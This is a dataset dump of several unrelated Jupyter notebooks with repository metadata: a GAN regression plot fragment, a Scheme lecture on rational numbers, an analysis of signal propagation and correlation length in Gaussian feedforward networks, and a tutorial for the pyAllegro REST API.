"features[:, 0] = (features[:, 0] / 2 + 0.5) *0.4866197183098592+0.06338028169014084\n\nlabels_plt[:, 0] = (labels_plt[:, 0] / 2 + 0.5) *0.4866197183098592+0.06338028169014084\n\n\nfig, ax = plt.subplots(1, 1)\nfig.set_size_inches(6, 5, forward=True)\n\n\n# labels_cor includes: orientation, background_ratio, width, amplitude/wavelength ratio, after shifting to (-1, 1)\nax.scatter(labels_plt[:, 0], features[:, 0]) \n# calc the trendline\nz3 = np.polyfit(labels_plt[:, 0], features[:, 0], 1)\np3 = np.poly1d(z3)\nax.plot(labels_plt[:, 0],p3(labels_plt[:, 0]),\"r-\")\n# the line equation:\nprint (\"y=%.6fx+(%.6f)\"%(z3[0],z3[1]))\nax.set_xlabel(\"Amplitude/wavelength ratio inputted to D\")\nax.set_ylabel(\"Predicted amplitude/wavelength ratio by D\")\n#plt.savefig(network_dir +\"Mud facies ratio scatter of fake vs real.png\", dpi=200) ",
"y=0.820349x+(0.097468)\n"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
]
] |
cb040e36565a52f99005729b8bcb2f217679a330 | 5,889 | ipynb | Jupyter Notebook | Lectures/Lec9.ipynb | Kausta/Comp200LN | 73b897501827bdb742f827dd8971b123cf9e12ec | [
"Apache-2.0"
] | 1 | 2019-01-08T14:36:55.000Z | 2019-01-08T14:36:55.000Z | Lectures/Lec9.ipynb | Kausta/Comp200LN | 73b897501827bdb742f827dd8971b123cf9e12ec | [
"Apache-2.0"
] | null | null | null | Lectures/Lec9.ipynb | Kausta/Comp200LN | 73b897501827bdb742f827dd8971b123cf9e12ec | [
"Apache-2.0"
] | null | null | null | 18.064417 | 101 | 0.42435 | [
[
[
"# Lec9 `#17/10/17`",
"_____no_output_____"
],
[
"## Examples",
"_____no_output_____"
],
[
"### Box and Pointer Examples\n\nTrivial examples of scheme representation, box and pointer diagram, and printed representation.",
"_____no_output_____"
],
[
"### HOP Examples\n",
"_____no_output_____"
],
[
"```scheme \n(define f (multiplier 3))\n(f 5) ; 15\n(f 3) ; 9\n```\nType of multiplier: Number -> (Number -> Number)\n\nType of f: Number -> Number\n",
"_____no_output_____"
]
],
[
[
"(define (multiplier n)\n (lambda (x) (* x n)))\n(define f (multiplier 3))\n(f 5)",
"_____no_output_____"
],
[
"(define (repeated f n)\n (lambda (x) \n (if (= n 0)\n x\n (f ((repeated f (- n 1)) x))\n )))\n(define (mul a b)\n ((repeated (lambda (x) (+ x a)) b) 0))\n(mul 3 4)",
"_____no_output_____"
],
[
"(define (exp a b)\n ((repeated (lambda (x) (* x a)) b) 1))\n(exp 2 4)",
"_____no_output_____"
]
],
[
[
"### Rational Numbers ",
"_____no_output_____"
],
[
"#### Interface\n\n```scheme\n(make-rat n d) ; Rational Number Object\n(numer obj) ; n\n(denom obj) ; d\n```",
"_____no_output_____"
]
],
[
[
"(define (+rat x y) ; x, y are rational numbers\n (make-rat (+ (* (numer x) (denom y)) \n (* (numer y) (denom x)))\n (* (denom x) (denom y))))",
"_____no_output_____"
],
[
"(define (*rat x y)\n (make-rat (* (numer x) (numer y))\n (* (denom x) (denom y))))",
"_____no_output_____"
]
],
[
[
"#### Implementation 1\n\n- Cons \n- Car\n- Cdr",
"_____no_output_____"
],
[
"#### Implementation 2\n\n- List\n- Car\n- Cadr",
"_____no_output_____"
]
],
[
[
"(define (make-rat x y) (cons x y))\n(define (numer x) (car x))\n(define (denom x) (cdr x))",
"_____no_output_____"
],
[
"(define a (make-rat 1 2))\n(define b (make-rat 1 4))\n(define c (+rat a b))\n(display (numer c)) (newline)\n(display (denom c))",
"6\n8"
]
],
[
[
"#### Simplification",
"_____no_output_____"
]
],
[
[
"(define (gcd a b) \n (if (= a 0)\n b\n (gcd (% b a) a)))",
"_____no_output_____"
],
[
"(define (make-rat x y) \n (cons (/ x (gcd x y))\n (/ y (gcd x y))))",
"_____no_output_____"
],
[
"(define c (+rat a b))\n(display (numer c)) (newline)\n(display (denom c))",
"3\n4"
],
[
"(define (make-rat x y) (cons x y))\n(define (numer x) (/ (car x) (gcd (car x) (cdr x))))\n(define (denom x) (/ (cdr x) (gcd (car x) (cdr x))))",
"_____no_output_____"
],
[
"(define c (+rat a b))\n(display (numer c)) (newline)\n(display (denom c))",
"3\n4"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
]
] |
cb04227b0dc436857b4a6960bca48e6dba77399a | 419,363 | ipynb | Jupyter Notebook | Gaussian_Feedforward_Analysis.ipynb | ro-jefferson/entropy_dnn | 30a27684fefba5f056c199f64e22b0001742d936 | [
"MIT"
] | 6 | 2021-07-17T21:15:58.000Z | 2021-12-23T00:14:10.000Z | Gaussian_Feedforward_Analysis.ipynb | ro-jefferson/entropy_dnn | 30a27684fefba5f056c199f64e22b0001742d936 | [
"MIT"
] | null | null | null | Gaussian_Feedforward_Analysis.ipynb | ro-jefferson/entropy_dnn | 30a27684fefba5f056c199f64e22b0001742d936 | [
"MIT"
] | 2 | 2021-09-23T07:45:19.000Z | 2022-02-03T12:19:06.000Z | 529.498737 | 197,732 | 0.936539 | [
[
[
"# Gaussian feedforward -- analysis\nRo Jefferson<br>\nLast updated 2021-05-26\n\nThis is the companion notebook to \"Gaussian_Feedforward.ipynb\", and is designed to read and perform analysis on data generated by that notebook and stored in HDF5 format.\n\n**The user must specify** the `PATH_TO_DATA` (where the HDF5 files to be read are located) and the `PATH_TO_OUTPUT` (where any plots will be written) below.",
"_____no_output_____"
]
],
[
[
"# Numpy, scipy, and plotting:\nimport numpy as np\nfrom scipy.stats import norm # Gaussian fitting\nimport scipy.integrate as integrate # integration\nimport matplotlib.pyplot as plt # plotting\nimport seaborn as sns; sns.set() # nicer plotting\nimport pandas as pd # dataframe for use with seaborn\n\n# File i/o:\nimport pickle # for unpickling MNIST data\nimport gzip # for opening pickled MNIST data file\nimport h5py # HDF5\n\n# Miscellaneous:\nimport math\nimport random # random number generators\nimport re # regular expressions\nimport gc # garbage collection\n\n# symbolic algebra package:\nimport sympy as sym\nfrom sympy import tanh",
"_____no_output_____"
]
],
[
[
"## Import HDF5 data\nSpecify the path to the .hdf5 files containing the accuracies and hooks, and define functions to load the data as dictionaries:",
"_____no_output_____"
]
],
[
[
"PATH_TO_DATA = '/full/path/to/HDF5/data/'\nPATH_TO_OUTPUT = '/full/path/where/plots/are/to/be/saved/'\n\n# read file of accuracies, return dataset as dictionary:\ndef read_accuracies(file_name):\n with h5py.File(PATH_TO_DATA + file_name, 'r') as file:\n # cast elements as np.array, else returns closed file datasets:\n acc_dict = {key : np.array(file[key]) for key in file.keys()} \n \n return acc_dict\n\n\n# read file of inputs/outputs, return dataset as dictionary:\ndef read_hooks(file_name): \n with h5py.File(PATH_TO_DATA + file_name, 'r') as file:\n # cast elements as np.array, else returns closed file datasets:\n hook_dict = {key : np.array(file[key]) for key in file.keys()}\n \n return hook_dict\n\n\n# read file of weights, biases; return dataset as dictionary:\ndef read_parameters(file_name):\n with h5py.File(PATH_TO_DATA + file_name, 'r') as file:\n # cast elements as np.array, else returns closed file datasets:\n for key in file.keys():\n para_dict = {key : np.array(file[key]) for key in file.keys()} \n \n return para_dict\n\n\n# load data, ensuring consistent files:\ndef load_data(acc_file, hook_file, para_file, verbose=True):\n accuracies = read_accuracies(acc_file)\n hooks = read_hooks(hook_file)\n parameters = read_parameters(para_file)\n \n var_w = accuracies['var_weight'].item()\n var_b = accuracies['var_bias'].item()\n \n if var_w != hooks['var_weight'].item() or var_w != parameters['var_weight'].item():\n raise Exception('Weight variances do not match!')\n elif var_b != hooks['var_bias'].item() or var_b != parameters['var_bias'].item():\n raise Exception('Bias variances do not match!')\n \n # extract accuracies corresponding to depth in hook file:\n index = np.where(accuracies['depth'] == hooks['depth'])[0] # array of matches\n if index.size == 0: # empty array = no match\n raise Exception('No matching depth!')\n else:\n acc = accuracies['accuracies'][index[0]]\n \n \n print('Successfully loaded network with the following parameters:'\n '\\nDepth = {}\\nvar_w = {}\\nvar_b = {}\\n'.format(hooks['depth'].item(), var_w, var_b))\n \n # optionally print key lists:\n if verbose:\n print('Hook keys:\\n{}\\n'.format(hooks.keys()))\n print('Parameter keys:\\n{}\\n'.format(parameters.keys()))\n \n return acc, hooks, parameters",
"_____no_output_____"
]
],
[
[
"So, for example, we can read in files and extract the hyperparameters as follows:",
"_____no_output_____"
]
],
[
[
"accs, hooks, paras = load_data('acc-150-30.hdf5', 'e14-hooks-150-30.hdf5', 'e14-para-150-30.hdf5')\n\ndepth = hooks['depth'].item()\nvar_w = hooks['var_weight'].item()\nvar_b = hooks['var_bias'].item()",
"Successfully loaded network with the following parameters:\nDepth = 30\nvar_w = 1.5\nvar_b = 0.05\n\nHook keys:\ndict_keys(['depth', 'in-0', 'in-1', 'in-10', 'in-11', 'in-12', 'in-13', 'in-14', 'in-15', 'in-16', 'in-17', 'in-18', 'in-19', 'in-2', 'in-20', 'in-21', 'in-22', 'in-23', 'in-24', 'in-25', 'in-26', 'in-27', 'in-28', 'in-29', 'in-3', 'in-4', 'in-5', 'in-6', 'in-7', 'in-8', 'in-9', 'var_bias', 'var_weight'])\n\nParameter keys:\ndict_keys(['B0', 'B1', 'B10', 'B11', 'B12', 'B13', 'B14', 'B15', 'B16', 'B17', 'B18', 'B19', 'B2', 'B20', 'B21', 'B22', 'B23', 'B24', 'B25', 'B26', 'B27', 'B28', 'B29', 'B3', 'B4', 'B5', 'B6', 'B7', 'B8', 'B9', 'W0', 'W1', 'W10', 'W11', 'W12', 'W13', 'W14', 'W15', 'W16', 'W17', 'W18', 'W19', 'W2', 'W20', 'W21', 'W22', 'W23', 'W24', 'W25', 'W26', 'W27', 'W28', 'W29', 'W3', 'W4', 'W5', 'W6', 'W7', 'W8', 'W9', 'depth', 'var_bias', 'var_weight'])\n\n"
]
],
[
[
"## Analysis functions\nHere we'll define some useful functions for analyzing the results. To begin, let's write a simple function that returns the distribution of pre-/post-activations (i.e., inputs/outputs) for each layer, to see whether they remain Gaussian.",
"_____no_output_____"
]
],
[
[
"# return mean and variance for the layer, and optionally plot:\ndef view_layer(key, plot=False, truncate=1000):\n layer = hooks[key][-truncate:] # use last `truncate` samples, else excessive size\n sns.distplot(layer, fit=norm)\n if not plot: plt.close() # optionally suppress figure\n mean, std = norm.fit(layer)\n \n return mean, std**2\n\n# same, but accept layer as array:\ndef view_array(layer, plot=False):\n sns.distplot(layer, fit=norm)\n if not plot: plt.close() # optionally suppress figure\n mean, std = norm.fit(layer)\n \n return mean, std**2",
"_____no_output_____"
]
],
[
[
"Let's look at a few layers:",
"_____no_output_____"
]
],
[
[
"# current dataset corresponds to `wide` network option, so should remain Gaussian until the last couple layers:\nview_layer('in-0', True)\nview_layer('in-15', True)\nview_layer('in-27', True)\nview_layer('in-29', True) # only 10 neurons, don't expect Gaussian",
"_____no_output_____"
]
],
[
[
"Of chief importance is the fixed-point $q^*$. We can find the approximate value with the following process: first, we numerically evaluate the integral expression for $q^{\\ell+1}$ as a function of $q^{\\ell}$ for a grid of points. We can optionally use this to plot $q^{\\ell+1}$ and the unit slope, but all we really need is the nearest datapoint (in the aforementioned grid) to the intersection, which we find by identifying the index at which the difference between these two curves changes sign. Then, we apply linear interpolation to the corresponding line segments to approximate the precise value of the intersection.\n\nDenote the endpoints of the line segment with unit slope $(x_1, y_1=x_1)$ and $(x_2, y_2=x_2)$, and the endpoints of the segment of the $q$-curve $(x_3=x_1, y_3)$ and $(x_4=x_2, y_4)$. Then Cramer's rule reduces to the following expression for the intersection point $x=y$:\n\n\\begin{equation}\nx=\\frac{(x_1y_4-x_2y_3)}{(x_1-x_2)-(y_3-y_4)}\n\\end{equation}",
"_____no_output_____"
]
],
[
[
"# recursive expression for the variances, eq. (14) in my blog:\ndef next_q(q, var_w=1, var_b=0):\n integral = integrate.quad(lambda z: np.exp(-z**2/2)*np.tanh(np.sqrt(q)*z)**2, -np.inf, np.inf)[0]/np.sqrt(2*np.pi)\n return var_w*integral + var_b\n\n# compute q* given variances, and optionally plot q^{l+1} vs. q^l:\ndef find_qstar(var_weight, var_bias, plot = False, domain = 2): # check between 0 and domain\n # grid of points for numerical sampling:\n points = np.arange(0,domain,0.05)\n qnew = [next_q(q, var_weight, var_bias) for q in points]\n \n # find index (i.e., datapoint) at which difference between curves changes sign:\n flip = np.argwhere(np.diff(np.sign(qnew-points)))[0][0]\n \n # extract line segments which contain the intersection:\n seg1 = points[flip:flip+2]\n seg2 = qnew[flip:flip+2]\n\n # intersection point x=4 via Cramer's rule:\n qstar = (seg1[0]*seg2[1] - seg1[1]*seg2[0])/(seg1[0] - seg1[1] - seg2[0] + seg2[1])\n \n if plot:\n line_df = pd.DataFrame({'q_l': points, 'q_{l+1}': points})\n theory_df = pd.DataFrame({'q_l': points, 'q_{l+1}': qnew})\n sns.lineplot('q_l', 'q_{l+1}', data=theory_df, marker='o');\n sns.lineplot('q_l', 'q_{l+1}', data=line_df, marker='o');\n \n return qstar",
"_____no_output_____"
]
],
[
[
"For example, for the case above, we have:",
"_____no_output_____"
]
],
[
[
"qstar = find_qstar(var_w, var_b, plot=True)\nprint(qstar)",
"0.4174806682136245\n"
]
],
[
[
"Similarly, we would like to find the fixed point $\\rho^*$, which is found by numerically solving a similar recursion relation, and then applying the flip-interpolation strategy above:",
"_____no_output_____"
]
],
[
[
"# recursive expression for the Pearson correlation coefficient, eq. (23) in my blog:\ndef next_rho(rho, qstar, var_w=1, var_b=0):\n sq = np.sqrt(qstar)\n bound = np.inf # integration bound (should be np.inf)\n \n integral = integrate.dblquad(lambda x, y: np.exp(-x**2/2)*np.exp(-y**2/2)*np.tanh(sq*x)*np.tanh(sq*(rho*x+np.sqrt(1-rho**2)*y)),\n -bound, bound, lambda x: -bound, lambda x: bound)[0]/(2*np.pi)\n return (var_w*integral + var_b)/qstar\n\n\n# compute rho* given q*, variances; optionally plot rho^{l+1} vs. rho^l:\ndef find_rhostar(qstar, var_weight, var_bias, plot = False):\n # grid of points for numerical sampling:\n points = np.arange(0,1.01,0.05)\n rhonew = [next_rho(rho, qstar, var_weight, var_bias) for rho in points]\n\n # find index (i.e., datapoint) at which difference between curves changes sign:\n where = np.argwhere(np.diff(np.sign(rhonew-points)))\n if where.size == 0:\n rhostar = 1\n else:\n flip = np.argwhere(np.diff(np.sign(rhonew-points)))[0][0]\n\n # extract line segments which contain the intersection:\n seg1 = points[flip:flip+2]\n seg2 = rhonew[flip:flip+2]\n\n # intersection point x=4 via Cramer's rule:\n rhostar = (seg1[0]*seg2[1] - seg1[1]*seg2[0])/(seg1[0] - seg1[1] - seg2[0] + seg2[1])\n \n if plot:\n line_df = pd.DataFrame({'rho_l': points, 'rho_{l+1}': points})\n theory_df = pd.DataFrame({'rho_l': points, 'rho_{l+1}': rhonew})\n sns.lineplot('rho_l', 'rho_{l+1}', data=theory_df, marker='o');\n sns.lineplot('rho_l', 'rho_{l+1}', data=line_df, marker='o');\n \n return rhostar",
"_____no_output_____"
]
],
[
[
"For example, for the $q^*$ value and associated variances above, we have:",
"_____no_output_____"
]
],
[
[
"rhostar = find_rhostar(qstar, var_w, var_b, True)\nprint(rhostar)",
"1\n"
]
],
[
[
"With these values in hand, we can compute the theoretical correlation length, given by eq. (27) in my blog (which is eq. (9) in Schoenholz et al.):",
"_____no_output_____"
]
],
[
[
"# correlation length (for the Pearson correlation coefficient):\ndef correlation_length(rhostar, qstar, var_w=1):\n sq = np.sqrt(qstar)\n bound = 100 # integration bound (should be np.inf, but that causes overflow errors)\n \n integral = integrate.dblquad(lambda x, y: np.exp(-x**2/2)*np.exp(-y**2/2)*(1/np.cosh(sq*x))**2*(1/np.cosh(sq*(rhostar*x+np.sqrt(1-rhostar**2)*y))**2),\n -bound, bound, lambda x: -bound, lambda x: bound)[0]/(2*np.pi)\n return -1/np.log(var_w*integral)",
"_____no_output_____"
],
[
"correlation_length(rhostar, qstar, var_w)",
"_____no_output_____"
]
],
[
[
"# Probing fall-off\nTheoretically, we should be able to train deeper networks at criticality, and they should all fall-off based on the correlation length. To see how our networks behave, we'll write a function that reads-in a grid-worth of accuracy data (optionally plotting the individual accuracies), and another that uses this function to make the desired scatterplot:",
"_____no_output_____"
]
],
[
[
"# automatically read and plot accuracies from a series of files **with the same variances**:\ndef read_and_plot_accs(base, start, stop, step, plot=True, write=False):\n # file names in format acc-{base}-{dd}.hdf5\n filenames = ['acc-{}-{}.hdf5'.format(base, dd) for dd in range(start, stop, step)]\n \n #print('Reading {} files: {}\\n'.format(len(filenames), filenames))\n \n # get list of accuracies and corresponding depths:\n acc, depth = [], []\n for i in range(len(filenames)):\n # load data:\n acc_dict = read_accuracies(filenames[i]) \n \n acc.append(acc_dict['accuracies'])\n depth.append(acc_dict['depth'].item())\n\n # get variances from last file:\n var_w = acc_dict['var_weight'].item()\n var_b = acc_dict['var_bias'].item()\n \n if plot: \n #plt.rcParams['figure.figsize'] = [9, 6] # globally (!) adjust figure size \n \n # plot each series, labelled by depth:\n list_dict = {'L = {}'.format(dd) : pd.Series(acc[i])\n for i,dd in enumerate(depth)}\n df = pd.DataFrame(list_dict)\n acc_plot = df.plot()\n \n # format legend, title:\n acc_legend = acc_plot.legend(loc='upper left', bbox_to_anchor=(1,1))\n acc_plot.set_title('var_w = {}'.format(var_w)) # all var_w equal\n \n # optionally save plot as pdf:\n if write:\n plt.savefig(PATH_TO_OUTPUT+'plot-{}.pdf'.format(base), \n bbox_extra_artists=(acc_legend,), bbox_inches='tight')\n\n return acc, depth, var_w, var_b\n ",
"_____no_output_____"
],
[
"# read-in accuracies using pre-defined function above, and use this to\n# make scatterplot like fig. 5 in Schoenholz et al.:\ndef probe_falloff(base_list, start, stop, step, plot=True, write=False):\n # read accuracies, with plot suppressed:\n acc_list, dep_list, w_list, b_list = [], [], [], []\n for base in base_list:\n acc, dep, w, b = read_and_plot_accs(base, start, stop, step, False, False)\n \n # store final accuracy from run:\n acc_list.append([a[-1] for a in acc])\n \n # store list of depths, variances:\n dep_list.append(dep)\n w_list.append(w)\n b_list.append(b)\n \n # var_w gives x-values:\n x_vals = []\n for i in range(len(w_list)):\n # make len(acc_list[i]) copies of w_list[i]:\n x_vals.append([w_list[i]]*len(acc_list[i]))\n \n x_vals = np.array(x_vals).flatten()\n \n # depths give y-values:\n y_vals = np.array(dep_list).flatten()\n \n # accuracies give z-values (color):\n z_vals = np.array(acc_list).flatten()\n \n # optionally make scatterplot:\n if plot:\n scat_plot = plt.scatter(x_vals, y_vals, c=z_vals, cmap='rainbow', s=50)\n plt.colorbar(scat_plot) # add colorbar as legend\n \n # add title, axes labels:\n plt.title('var_b = {}'.format(b_list[0])) # all var_b equal\n plt.xlabel('var_w')\n plt.ylabel('depth')\n \n # optionally save plot as pdf:\n if write:\n # should all have same bias, so label with that:\n plt.savefig(PATH_TO_OUTPUT+'scatterplot-{}.pdf'.format(b_list[0]),)\n \n return x_vals, y_vals, z_vals, b_list",
"_____no_output_____"
],
[
"# read and plot:\nvar_list, dep_list, acc_list, b_list = probe_falloff([x for x in range(100,286,5)], 10, 70, 3, True, False)",
"_____no_output_____"
]
],
[
[
" How does this compare with the theoretical value of the correlation length? We can easily compute this using the $q^*$, $\\rho^*$, and `correlation_length` functions above:",
"_____no_output_____"
]
],
[
[
"# same range of var_w values as above, for given var_b:\ntest_w = np.arange(1.0, 2.86, 0.05)\ntest_b = 0.05\n\nqstar_test = [find_qstar(ww, test_b, False) for ww in test_w]\n#print('q* = ', qstar_test)\n\nrhostar_test = [find_rhostar(qq, ww, test_b, False) for qq, ww in zip(qstar_test, test_w)]\n#print('\\nrho* = {}\\n'.format(rhostar_test))\n\nxi_vals = np.array([correlation_length(rr, qq, ww) for rr,qq,ww in zip(rhostar_test,qstar_test,test_w)])",
"_____no_output_____"
]
],
[
[
"In principle this should never be negative, but the numerics are such that the integral can be greater than 1 near the critical point, which makes $\\xi<0$. Since we can't plot infinity, let's just replace this with double the largest positive value for visualization purposes:",
"_____no_output_____"
]
],
[
[
"neg_index = np.where(np.array(xi_vals) < 0)[0].item() # get index of negative value\nxis = np.copy(xi_vals)\nxis[neg_index] = 2*max(xi_vals)\n\nxi_df = pd.DataFrame({'var_w': test_w, 'xi': xis})\nxi_plot = sns.lineplot('var_w', 'xi', data=xi_df, marker='o');\nxi_plot.set_ylim(0,100);",
"_____no_output_____"
]
],
[
[
"This is fine, but it would be nice to overlay the theoretical curve on the grid:",
"_____no_output_____"
]
],
[
[
"# re-create and overlay above two plots:\ndef overlay_falloff(base_list, start, stop, step, write=False):\n # ************ load and process data for scatterplot: ************\n \n # read accuracies, with plot suppressed:\n acc_list, dep_list, w_list, b_list = [], [], [], []\n for base in base_list:\n acc, dep, w, b = read_and_plot_accs(base, start, stop, step, False, False)\n \n # store final accuracy from run:\n acc_list.append([a[-1] for a in acc])\n \n # store list of depths, variances:\n dep_list.append(dep)\n w_list.append(w)\n b_list.append(b)\n \n # var_w gives x-values:\n x_vals = []\n for i in range(len(w_list)):\n # make len(acc_list[i]) copies of w_list[i]:\n x_vals.append([w_list[i]]*len(acc_list[i]))\n \n x_vals = np.array(x_vals).flatten()\n \n # depths give y-values:\n y_vals = np.array(dep_list).flatten()\n \n # accuracies give z-values (color):\n z_vals = np.array(acc_list).flatten()\n \n # ************ process data for correlation length plot: ************\n \n qstar = [find_qstar(ww, b_list[0], False) for ww in w_list] # all biases equal, so just use first\n \n rhostar = [find_rhostar(qq, ww, b_list[0], False) for qq, ww in zip(qstar, w_list)]\n \n xi_vals = np.array([correlation_length(rr, qq, ww) for rr,qq,ww in zip(rhostar, qstar, w_list)]) \n\n # ensure no negative elements (see comment about numerics near critical point above):\n artificial_xi = 2*max(xi_vals) # overwrite negative values with this\n for i in range(xi_vals.size):\n if xi_vals[i] < 0:\n xi_vals[i] = artificial_xi\n \n # consider a few different multiples of the correlation length, for comparison with Schoenholz et al.:\n three_vals = [np.pi*xx for xx in xi_vals]\n six_vals = [2*np.pi*xx for xx in xi_vals]\n \n # ************ overlay correlation length plot on scatterplot: ************ \n \n # create combination figure:\n fig, ax1 = plt.subplots(figsize=(9,6))\n ax2 = ax1.twinx() # share x axis\n \n # make scatterplot:\n ax1.set_xlabel(r'$\\sigma_w^2$')\n ax1.set_ylabel('depth')\n scat_plot = ax1.scatter(x=x_vals, y=y_vals, c=z_vals, cmap='rainbow', s=120) # does not return Axes object!\n ax1.tick_params(axis='y')\n # truncate for cleaner visuals:\n ax1.set_ylim(min(y_vals)-1, max(y_vals)+1)\n ax1.set_xlim(min(w_list)-0.05, max(w_list)+0.05)\n # ax1.set_title('Optional title here')\n cbar = plt.colorbar(scat_plot, label='accuracy') # add colorbar as legend\n # control labels/ticks position colorbar:\n cbar.ax.yaxis.set_ticks_position('right')\n cbar.ax.yaxis.set_label_position('left')\n\n # overlay correlation length plot:\n xi_df = pd.DataFrame({'var_w': w_list, 'xi': xi_vals})\n ax2 = sns.lineplot('var_w', 'xi', data=xi_df, marker=None, color='black')\n # n.b., use None instead of False, else pdf still has white horizontal ticks\n \n xi3_df = pd.DataFrame({'var_w': w_list, 'xi': three_vals})\n sns.lineplot('var_w', 'xi', data=xi3_df, marker=None, color='grey')\n \n xi6_df = pd.DataFrame({'var_w': w_list, 'xi': six_vals})\n sns.lineplot('var_w', 'xi', data=xi6_df, marker=None, color='darkgrey')\n # n.b., darkgrey is *lighter* than grey, because what the fuck programmers\n \n # truncate to same range/domain:\n ax2.set_ylim(min(y_vals)-1, max(y_vals)+1)\n ax2.set_xlim(min(w_list)-0.05, max(w_list)+0.05)\n # turn off second labels, ticks, and grid:\n ax2.set_ylabel(None)\n ax2.grid(False)\n ax2.axis('off')\n\n # optionally save plot as pdf:\n if write:\n # should all have same bias, so label with that:\n plt.savefig(PATH_TO_OUTPUT+'scatterplot-{}.pdf'.format(b_list[0]),)\n \n return x_vals, y_vals, z_vals, b_list",
"_____no_output_____"
],
[
"overlay_falloff([x for x in range(100,286,5)], 10, 70, 3, xis, False);",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
cb04290b2c7c633fbadc32444972f983219bbf46 | 14,460 | ipynb | Jupyter Notebook | tutorial_RestApi.ipynb | xSzpo/pyAllegro | ad14e076785e05d798d7e75efff9024ac01bb839 | [
"MIT"
] | null | null | null | tutorial_RestApi.ipynb | xSzpo/pyAllegro | ad14e076785e05d798d7e75efff9024ac01bb839 | [
"MIT"
] | null | null | null | tutorial_RestApi.ipynb | xSzpo/pyAllegro | ad14e076785e05d798d7e75efff9024ac01bb839 | [
"MIT"
] | null | null | null | 32.714932 | 165 | 0.48527 | [
[
[
"# pyAllegro: WebApi",
"_____no_output_____"
],
[
"## Import package and setup credentials",
"_____no_output_____"
]
],
[
[
"from pyAllegro.api import AllegroRestApi",
"_____no_output_____"
],
[
"```\nRestApi = AllegroRestApi()\n#RestApi = AllegroRestApi(config_file_dir='/Users/xszpo/.allegroApiConfig')\n\nRestApi.credentials_set(\n appName='<credentials from allegro>',\n clientId='<credentials from allegro>',\n clientSecred='<credentials from allegro>',\n redirectUrl='http://localhost:8000'\n )\n```",
"_____no_output_____"
]
],
[
[
"## Get token",
"_____no_output_____"
]
],
[
[
"RestApi = AllegroRestApi()",
"_____no_output_____"
],
[
"RestApi.get_token()",
"_____no_output_____"
]
],
[
[
"```\nRestApi.get_token()\n\nserver_address: ('localhost', 8000)\nWaiting for response with access_code from Allegro.pl (user authorization in progress)...\nGot an authorize code\n```\nDuring this process you will be redirected to allegro login page and you will be ask for access to your allegro account. \n<br/>\nToken that you'll receive is valid for 12 hours but don't worry, pyAllegro will refresh it automatically.\n\n\nIf you want to do it manually: \n```RestApi.load_token()``` - load token manually \n```RestApi.refresh_token()``` - refresh token manually \n\nAfter 12 months you will need to execute ```RestApi.get_token()``` process again.\n",
"_____no_output_____"
],
[
"## RestApi methods - how to use",
"_____no_output_____"
],
[
"Load PyAllegro and initiate AllegroRestApi instance. \nYour token will be loaded and refreshing automatically.",
"_____no_output_____"
]
],
[
[
"from pyAllegro.api import AllegroRestApi\nRestApi = AllegroRestApi()",
"_____no_output_____"
]
],
[
[
"You cann use all ```GET``` methods listed [here](https://developer.allegro.pl/documentation/) with ```RestApi.resource_get(resource_name='...',params={...})```",
"_____no_output_____"
],
[
"# Some examples",
"_____no_output_____"
],
[
"## User ratings summary",
"_____no_output_____"
]
],
[
[
"status_code, json_data = RestApi.resource_get(\n resource_name='/users/{userId}/ratings-summary'.format(\n **{'userId': 11791190}),\n params={}\n )",
"_____no_output_____"
]
],
[
[
"In response you will recive ```response.status_code``` and ```json``` with data",
"_____no_output_____"
]
],
[
[
"status_code",
"_____no_output_____"
],
[
"json_data",
"_____no_output_____"
]
],
[
[
"## offers listing - allegro search",
"_____no_output_____"
]
],
[
[
"status_code, json_data = RestApi.resource_get(\n resource_name='/offers/listing',\n params={'phrase': 'Dell Inspiron 7347 i5-4210U/8GB/256/Win8 FHD Dotyk',\n 'limit' : 1}\n )",
"_____no_output_____"
],
[
"json_data",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
